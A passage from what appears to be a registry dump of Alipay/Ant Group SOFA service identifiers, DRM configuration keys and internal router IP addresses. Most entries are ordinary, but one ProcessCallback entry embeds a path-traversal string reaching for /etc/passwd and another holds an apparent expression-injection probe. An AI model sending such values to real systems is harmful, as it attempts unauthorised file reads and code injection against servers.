@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.csconfig.service.mng.facade.api.TagRelationMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_DSMP#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.createResouceJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cdp.common.spi.creative.service.CdpSpiService:1.0:transferprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpromocenter.recruit.platform.service.facade.v2.api.PlanApplyOrderDetailQueryServiceV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alcontract.common.service.facade.ContractAttachQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.rulecenter:name=com.alipay.rulecenter.core.engine.drm.impl.RuleRouteStrategy.storeable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialportal.web.salary.rpc.facade.SalaryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iguapcenter.service.facade.migrate.GuapMigrationServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_COMM_MESSAGE_SENDER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Servers_TP_C_LINEPAY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:%{28923030-65465363}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchantprod.common.client.facade.AppletPayClientFacade:1.0:bkcloudfunds-appletPayClientFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.gradeQuotaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ismonitor.common.service.facade.auto.MonitorLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmResourceTrigger.specialInstInfoStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FixedData2SyncTable4CheckDrmImpl.planLoadNumForPlanCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpaas:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordermng.common.service.api.order.OrderAuditLogService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.232.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.23.248.106#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.128.236#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:staffSalaryDownloadCenterCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditprerec.service.CaseIterationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.creativecenter.openapi.LandingCreativeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqAlarmLevelDrm.newsMediaLevelLow,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.142.216#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.dataquality.facade.DataQualityWorkbenchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.zqualitywalleetoe.common.service.integration.opencore.InterfaceManageClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.PcardDataTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_GRDC_GLOBAL_SYNC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:ficcbffweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudinc.common.service.facade.AntvipDomainQueryFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rinsight.biz.customized.spi.GctRiskLabelSpi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.datasync.CompanyLogoSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqualitydatacore.common.service.facade.UserInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vehownerprod.facade.vehplatform.VehicleMsgAppCategoryConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icardcenter.service.facade.api.query.CardTokenValidateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPQueryFacade:1.0:bpQueryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FileFactoryEventListener:1.0:exriskcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rinsight.common.base.spi.RinsightRpcDataService:1.0:topologyExternalPropService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.LiquidateRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.211#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.charge:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:echo-OutSyncTransCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.clerktone.facade.api.clerkroletype.ClerkRoleTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.starSkyShowModel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insclaiminvestprod.facade.claim.invest.ClaimInvestManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.stream.facade.ClusterQuestionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.generalorder.OrderExtendSpi:1.0:publichome@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.pccontractprod.common.service.facade.api.contract.ContractPreQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.promoprod.common.service.facade.CampQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.145.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.177.219#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.128.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.181.84#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.promoplaycenter.common.service.facade.api.RelationRecordOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.tradequery.common.service.facade.TradeModelQueryFacade:1.0:tradequeryhis@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.102.210.144#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insclaiminvestprod.common.service.facade.InvestReplyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.access.OauthAuthTokenServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.requiremng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:spcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","io.sofastack.cafe.workflowx.sofarpc.facade.WorkflowxRPCInvocationFacade:1.0:SERVERLESS_PLAN_WF_OPS_CLOUD_CHANGE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:alipaypointcust@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitysimulate.common.service.client.antq.AntqMsgConsumer:1.0:acmantzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:mobileCodecRouteService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstoreapp.common.service.facade.sst.SSTEcardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-intellisensetwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.policy.api.QueryValidateProductRepositoryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_JARGUARD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:graycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:definpfprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.bizmonlog.api.BizMonCoordinateManagefacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:accountprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.cluster.ClusterMeteringFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.158.2.190#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.bizprod.common.service.facade.api.OTPVerificationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditpledge.facade.PledgeConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:prodswitch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.api.impl.ApiSyncFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbservindustryprod.common.service.facade.merchantactivity.MerchantOnlineActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskeventseek.facade.ChangeEventMetaServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.sub1:1.0@DEFAULT@testcloud#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.yunfengdieweb:name=com.alipay.sla.businessroute.drm.BusinessRoutePolicy.whiteListVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0://\\\\../\\\\../\\\\../\\\\../\\\\../\\\\../\\\\../\\\\../etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.179.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cswork.facade.permission.api.ZarkTenantService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_RMACCURATE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.createProductJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insuserinsight.facade.grid.GridMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirecenter.common.service.facade.api.OrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.biz.tradepush.core.RaiseResultNotifyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opssla.common.service.facade.DrmManageFacade:1.0:pure_opssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.secucommunity.common.service.facade.media.api.MediaContentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisioncenter.common.service.facade.api.ReCalcRiskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.chargefront:name=com.alipay.cif.drm.PasswordRevokeSwitch.paymentPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imaspmng.biz.meta.strageryQuery.StrageryMetaHandler:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.testLaunch001:name=com.alipay.darwin.release.releaseJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.logClientError,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_4009#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.159.248.87#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.voucherprod.facade.api.voucher.VcpVoucherPublishFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finslip.common.service.facade.recon.ReconBatchAdjustService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.core.service.MstSubTaskTinyAppPageDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mobilecashier@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.personalprod.service.facade.common.ContactManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayConfigDrm.repayReceiptNotRetryErrorCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitycore.common.service.facade.risk.api.RiskHandleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acassistant.common.service.facade.SatisfactionDegreeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.holoxlib.core.change.facade.ChangeManageFacade:1.0:holoxChangeManageService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.riskdatacenter.service.facade.limit.LimitBizFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:multiend@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.common.resource.PcreditFreeCardTemplateDrm.jyhfqAlipassId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:payrouter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.114.59#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_C_TRANSFER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.89.156.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ngfe.facade.NgfeLabelUpdateService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsteward.common.service.facade.service.OrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fundguard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.acbsbcore.common.service.rest.BsbGenericConfigRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mdda.core.service.meta.MetaSyncDevService:1.0:metaSyncDevService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","OLD_CLIENTSERVICE_TEST_1_1#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.yqcore.common.service.facade.api.ToutiaoCrawlerServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.SendSmsService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.purchases.AssetPurchasesProductInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:salaryDetailDownloadCenterCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.biz.activity.service.DiscountActivityVccToolAdapterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpaas:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.whiteCmdExpressions,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gftms.facade.api.basic.cashallocation.CashAllocationAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_DEFAULT_UNIFORM_EVENT12#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.45.76.152#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.config-security-false:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.openeval.common.service.facade.morpho.MiniappGrayReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.rccenter.common.service.facade.RccenterHgBuInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.AntVip-JavaClient:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.autoinsprod.common.insure.AutoVirtualPhoneConfigFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iassetcenter.service.facade.api.query.UserAccountAgreementQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0:processTaskExecuteImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.aip.FundFixedUnionQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.common.service.facade.activityha.ActivityhaServiceSpi:1.0:ampeQueryThreePointService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.mordercenter.KouBeiVouchercoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.117.201#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.autoinsprod.common.service.facade.AutoInsCompanyCooperationProductFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insdataprod.common.service.facade.dsb.api.DsbFeedBackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.validate.spi.SpiValidateFacade:1.0:benefitControlBizFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.127.206#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchservbase.common.service.task.external.service.TaskRzServiceFacade:1.0:mrchportalcoreRzFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.backend.api.BackendModifyInvFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.TaskBizInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accustomerweb.common.service.facade.ProjectManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:preDetail@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.article.ArticleInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.mng.MerchantCacheRefreshFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitysimulate.common.service.client.antq.AntqMsgConsumer:1.0:antdsr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.AnnouncementInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antpim.common.service.facade.org.api.OrgTreeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.service.impl.support.drm.LpAdminDrm.closeLoanApply,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialcore.facade.wireless.IsvCorpTokenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.24.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rdeclarecenter.biz.disclosure.manager.RdcDeclareMetaManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icdpcore.deliveryprod.common.service.facade.api.crowd.DecisionCrowdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acwareslifecore.common.service.facade.ResourceInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.partner.PartnerFacadeClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.generalorder.OrderExtendSpi:1.0:publichome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.facade.AutoCouponTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@amlcloud#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.finnet.service.facade.open.spi.FinnetSpiReceiveService:1.0:regsensor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fascore.common.service.facade.api.FundAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchmembercore.common.facade.activity.MemberCardActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebquery.common.facade.service.YebFatigueQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudlego:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixContains,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insxhbprod.common.service.facade.MemberFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.tool.BillToolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:zmepbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:pubbuservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_FINCOM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:fscagdsad@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.etetestcore.service.api.yeb.YebTransferOutService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.170.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.merchant.common.service.facade.SwitchCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.44.51#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insuranceprod.facade.PolicySynFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkinstassetprod.common.service.facade.api.IaRefactoringFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.cds.mng.ProductPoolFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbpunish.common.service.facade.materials.api.AttachmentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_BUDGET#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_INSRENEWPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.processmng.processmng_ds.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibank.mobiledsp.adapterservice.MobileAdapterService:1.0:bkwirelessdataportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.poscore.common.service.facade.creditcardfp.FastPayOrderQueryService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.175.86#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.Arch:name=com.alipay.xts.ldc.certifymng.changeMode,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.common.service.facade.ApportionUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acdoccore.common.service.facade.category.CategoryExpansionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.AblityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.mpoint.facade.MpointQuotaConfigQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.RiskRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_MSGBROKER-TUTORIAL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.fraudmng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportSampling,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchportalcore.common.service.facade.serviceenhance.ServiceEnhancerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwsap.common.service.facade.speedup.SpeedupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayConfigDrm.deductFail,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpwm.facade.share.SerialNoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.bd.BdProspectQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudinc.core.dns.ctrlmng.DnsCtrlDataTransfer:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.core.service.swap.engine.SwapOrderEngine:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.RelievePunishmentService:1.0@XFIR